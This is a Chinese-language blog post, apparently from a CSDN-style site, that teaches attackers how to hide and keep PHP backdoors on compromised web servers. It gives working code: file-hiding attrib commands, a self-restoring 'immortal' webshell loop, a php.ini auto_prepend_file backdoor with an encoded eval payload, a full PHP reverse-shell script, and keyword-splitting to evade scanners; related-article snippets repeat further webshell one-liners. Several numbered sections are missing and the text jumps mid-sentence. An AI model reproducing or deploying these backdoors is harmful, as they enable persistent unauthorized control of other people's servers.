php如何开后门,php如何隐藏后门

最新推荐文章于 2024-07-10 07:05:01 发布
最新推荐文章于 2024-07-10 07:05:01 发布
阅读量283 收藏
点赞数
文章标签: php如何开后门

php如何隐藏后门

php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。

082ac019eb675450885fc822b6493c99.png

推荐:《PHP教程》

php 后门隐藏技巧

1. attrib +s +h

创建系统隐藏文件:

attrib +s +a +r +h

attrib +s +h 文件名

41e500bda684584910dedbe93a696e8c.png

解决覆盖重写或者重启 web 服务删掉即可。<?php

set_time_limit(0);

ignore_user_abort(1);

unlink(__FILE__);

while(1){

file_put_contents('webshell.php','clear');

sleep(1);

}

五. php.ini后门

将下面后门写入php.iniallow_url_include=On

auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"

// base64 <?php @eval($_REQUEST[cmd]);?>

// 后门类型可自己修改。

这些做好后,重启 web 服务就好了。

方法1. 如果权限很大的话,自己手动重启,缺点容易暴露,重启服务,就要上服务器,某里的服务器,异地登陆有短信提醒。

方法2.就是加载一个 php_socke.php 脚本,让他重新加载 php.ini

此后门,任何php都可菜刀连接<?php

/******************************/

/* 只适用于windows系统 */

/******************************/

while(true){//别问我为什么要死循环,我也不清楚,只有设置成死循环才能加载新的 php.ini ...

@set_time_limit(0);

$system=strtoupper(substr(PHP_OS,0,3));

if(!extension_loaded('sockets'))

{

if($system=='WIN'){@dl('php_sockets.dll')ordie("Can't load socket");}

}

$host='255.255.255.255';// 搞一个不存在的ip,万一给人家反弹过去了岂不是真尴尬了~~~

$port=1998;//别问我为什么是1998,问了我也不会告诉你....

if($system=="WIN"){$env=array('path'=>'c:\\windows\\system32');}

$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"),);

$host=gethostbyname($host);

$proto=getprotobyname("tcp");

if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket创建失败");}

if(($ret=@socket_connect($sock,$host,$port))<0){die("连接失败");}

else{

$message="PHP反弹连接\n";

@socket_write($sock,$message,strlen($message));

$cwd=str_replace('\\','/',dirname(__FILE__));

while($cmd=@socket_read($sock,65535,$proto))

{

if(trim(strtolower($cmd))=="exit"){

socket_write($sock,"Bye\n");exit;

}else{

$process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

if(is_resource($process)){

fwrite($pipes[0],$cmd);

fclose($pipes[0]);

$msg=stream_get_contents($pipes[1]);

socket_write($sock,$msg,strlen($msg));

fclose($pipes[1]);

$msg=stream_get_contents($pipes[2]);

socket_write($sock,$msg,strlen($msg));

$return_value=proc_close($process);

}

}

}

}

}

?>

//此脚本非百分百成功

6. 关键字拆分,多文件包含!

比如一句话:@eval($_POST['x']);我们可以写成$a=$_POST['x'];@eval($a);

我们可以将 $a=$_POST['x'];写入一个文件 POST.php

然后在 @eval($a); 一句话的上方使用 include "POST.php";的方式引用!

fec3b426e59a87a7c23981ce253c46c8.png

的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web 用.php 解析来

连接。。。有用的到的可以看看。

php如何隐藏后门的教程已介绍完毕,更多请关注跳墙网其他文章教程!

php如何隐藏后门相关教程

冷艳抠脚大婶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一款php后门 phpspy
10-29
关于phpspy这款php后门可以查看! 很多人也许因为没有使用过,所以不知道作用,我详细的说明一下! http://blog.csdn.net/jinzhai/archive/2007/10/29/1853678.aspx
PHP后门隐藏
weixin_34273479的博客
08-17 206
首先建立一PHP文件test.php 文件内容为:    $test=$_GET['test'];  @include 'test/'.$test;  ?>     Txt文件一般都是说明文件,所以我们把一句话***放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话***粘贴到t.txt文件里。然后访问[url]http://localhost...
PHP设置后门保护代码的亲身经历
最新发布
Li91314的博客
07-10 151
只有这样,我们才能确保自己的网站在日益复杂的网络环境中安全、稳定地运行。那天,我收到了一封来自服务器的警报邮件,说网站可能存在安全风险。这让我意识到,我的网站可能存在后门,被攻击者利用。通过这些措施的实施,我成功地保护了我的网站免受恶意攻击。只有不断学习、不断实践、不断完善自己的安全措施,才能确保网站的安全和稳定。但在这个过程中,我意识到,仅仅关闭后门是不够的,更重要的是要预防类似的事情再次发生。直到有一次,我负责维护的一个小型网站遭遇了恶意攻击,我才深刻意识到保护代码的重要性。
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 269
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
php后门隐藏技巧大全
hackzkaq的博客
01-13 125
`搜索公众号:白帽子左一,每天更新技术干货! 辛辛苦苦拿下的 shell,几天没看,管理员给删了。其实隐藏的技巧也有很多 1.attrib +s +h 一创建系统隐藏文件: attrib +s +a +r +h attrib +s +h 文件名 在 Windows 10下即使开启了显示隐藏的项目,或dir仍然看不见。 2. 利用 ADS 隐藏文件 NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的一个特性,在 NTFS文件系统下,每个文件都可以存在.
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
php逍遥商城系统源码分享
03-10
这个版本是无授权的,拿去用就可以了! 测试环境:EP主机 php5.6以上 现在我们来打开面板 1.创建网站,上传源码至网站根目录,解压、 解压完成后直接打开域名进行...零度提示:未知是否有后门请用D盾进行查杀后门
php云端免挂机某Q机器人源码支持虚拟主机
08-17
php云端免挂机某Q机器人源码支持虚拟主机,优点:上传服务器或虚拟主机解压配置好信息即可使用,不需要挂机宝和什么繁琐的操作,24小时在线(除非你的服务器或者虚拟主机死了) 可以自行在api.php添加自己喜欢的功能...
php木马扫描工具
01-15
不错的源码 先解压出来 用D盾扫一下,基本可疑的东西都能扫出来,然后自己打开看一下
PHP 危险函数解释 分析
10-30
这些函数如果被不小心或者未经授权地使用,可能导致严重的安全问题,例如执行任意系统命令、泄露敏感信息或者创建后门。下面将详细解释和分析这些函数及其潜在风险。 1. `phpinfo()`:此函数会输出PHP环境的详细...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
PHP后门隐藏与维持技巧
weixin_34067980的博客
05-23 230
0×00前言在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.以PHP-WEBBACKDOOR为例,抛砖引玉一个最常见的一句话后门可能写作这样<?php@eval($_POST['cmd']);?>或这样<?php@asse...
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 203
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
渗透学习之PHP--后门
qq_62886656的博客
10-03 1886
渗透学习之php
php如何留后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1079
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
PHP后门
qq_39751956的博客
07-08 256
简单的后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
php隐藏后门,php后门隐藏技巧
weixin_31092081的博客
03-09 327
一句话 and 大马phpspy 菜刀一句话反射后门$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));?>调用如x.php?m=system&c=whoami后门也可绕过某些检测禁用system函数的防护系统 php:inputphp://input是用来接收pos...
php漏洞php后门浅析以及防范措施
weixin_33766168的博客
05-04 354
前一排服务器被放了后门 ***者居然大白天在服务器上面打包整站程序,让人震惊的同时也让我们看清了我们服务器安全,代码安全方面的严重隐患! 这周总结了部分php安全方面的知识,就算浅薄,权当亡羊补牢也好,先记下来,以供日后参考。 php.ini 设置 1.disable_functions = phpinfo,passthru,exec,system,chroot,sc...
PHP无eval后门技巧解析
"这篇文章主要探讨了PHP中无eval的代码执行后门方法,包括assert、create_function、preg_replace以及mb_ereg_replace等函数的使用。虽然PHP 7对某些函数进行了限制,但仍然存在绕过的方式。" 在PHP中,进行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值